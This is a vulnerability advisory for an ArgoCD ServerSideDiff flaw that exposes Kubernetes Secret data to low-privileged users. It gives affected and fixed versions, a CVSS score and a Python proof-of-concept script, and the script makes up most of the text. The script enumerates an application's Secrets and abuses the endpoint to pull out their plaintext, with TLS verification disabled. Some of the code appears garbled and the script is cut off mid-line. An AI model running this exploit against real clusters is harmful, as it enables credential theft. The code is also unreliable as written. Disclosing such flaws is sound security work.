# Kubernetes Secret Extraction via ArgoCD ServerSideDiff

## Vulnerability Overview

The `ServerSideDiff` endpoint in ArgoCD is missing both an authorization check and masking of Secret data. An attacker who holds only low-privileged (for example, read-only) access to an ArgoCD application can extract plaintext Kubernetes Secret data by leveraging the Kubernetes API server's Server-Side Apply dry-run mechanism.

## Affected Versions

- **Affected Versions**: `github.com/argoproj/argo-cd/v3` (Go) 3.2.0 - 3.3.8
- **Fixed Versions**: 3.3.9, 3.2.11
- **CVSS Score**: 9.6 / 10 (Critical)
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: Low
- **User Interaction**: None
- **Scope**: Changed
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: None

## Remediation

Upgrade to one of the fixed versions:

- `3.3.9`
- `3.2.11`

## POC Code

```python
#!/usr/bin/env python3 """ Argo CD ServerSideDiff Secret Extraction PoC Usage: python3 poc.py Example: python3 poc.py argocd.int..com ey2b6d... my-app my-project """ import base64 import http.client import json import struct import sys import urllib.parse from collections import defaultdict def encode_varint(v): out = [] while v > 0x7f: out.append((v & 0x7f) | 0x80) v >>= 7 out.append(v & 0x7f) return bytes(out) def encode_str(field, val): tag = (field > 3].append(val) elif wtype == 2: length, pos = decode_varint(data, pos) fields[tag >> 3].append(data[pos:pos + length]) pos += length elif wtype == 5: fields[tag >> 3].append(data[pos:pos + 4]) pos += 4 elif wtype == 1: fields[tag >> 3].append(data[pos:pos + 8]) pos += 8 else: break return dict(fields) # -- grpc-web framing -- def grpc_frame(payload): return b"\x00\x00\x00\x00\x01" + struct.pack(">I", len(payload)) + payload def decode_grpc_frames(data): frames, pos = [], 0 while pos + 5 I", data[pos+1:pos+5])[0] pos += 5 frames.append((flag, data[pos:pos+length])) pos += length return frames # -- http helpers -- def make_conn(host): import ssl ctx = ssl.create_default_context() 
ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE return http.client.HTTPSConnection(host, 443, context=ctx, timeout=10) def rest_get(conn, path, token): conn.request("GET", path, headers={ "Authorization": "Bearer " + token, "Accept": "application/json", }) resp = conn.getresponse() body = resp.read() if resp.status != 200: return None, "HTTP %d %s" % (resp.status, body) return json.loads(body), None def grpc_post(conn, token, payload): conn.request("POST", "/application.ApplicationService/ServerSideDiff", body=grpc_frame(payload), headers={ "Content-Type": "application/grpc-web+proto", "Accept": "application/grpc-web+proto", "x-grpc-web": "1", "Authorization": "Bearer " + token, }) resp = conn.getresponse() raw = resp.read() if resp.status != 200: return None, "HTTP %d %s" % (resp.status, raw) frames = decode_grpc_frames(raw) for flag, data in frames: if flag == 0: return data, None return None, "no data frame in response" # -- main -- def main(): if len(sys.argv) != 5: print("Usage: python3 poc.py ") sys.exit(1) host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4] conn = make_conn(host) # step 1: list managed resources for the app, find secrets print("[*] Fetching managed resources for %s/%s..." % (project, app_name)) data, err = rest_get(conn, "/api/v1/applications/%s/managed-resources" % urllib.parse.quote(app_name), token) if err: print("[!] Failed: %s" % err); sys.exit(1) secrets = [] for r in data.get("items", []): if r.get("kind") != "Secret": continue name = r.get("name", "") ns = r.get("namespace", "") live = r.get("liveState", "") stype = "Opaque" if live and live != "null": try: stype = json.loads(live).get("type", "Opaque") except Exception: pass secrets.append((name, ns, stype, live)) if not secrets: print("[!] 
No secrets found in managed resources"); sys.exit(0) print("[+] Found %d secrets" % len(secrets)) # step 2: call ServerSideDiff for each secret total_extracted = 0 for sname, sns, stype, live_json in secrets: # build minimal target manifest (no data field) target = json.dumps({ "apiVersion": "v1", "kind": "Secret", "metadata": {"name": sname, "namespace": sns}, "type": stype }) # copy required annotations from live state for SA tokens if live_json and live_json != "null": try: live_annots = json.loads(live_json).get("metadata", {}).get("annotations", {}) k8s_annots = {k: v for k, v in live_annots.items() if k.startswith("kubernetes.io/")} if k8s_annots: target_obj = json.loads(target) target_obj["metadata"]["annotations"] = k8s_annots target = json.dumps(target_obj) except Exception: pass # for TLS secrets, include required placeholder fields if stype == "kubernetes.io/tls": target_obj = json.loads(target) target_obj["data"] = { "tls.crt": base64.b64encode(b"PLACEHOLDER").decode(), "tls.key": base64.b64encode(b"PLACEHOLDER").decode(), } target = json.dumps(target_obj) elif stype == "kubernetes.io/dockerconfigjson": target_obj = json.loads(target) target_obj["data"] = {"dockerconfigjson": base64.b64enc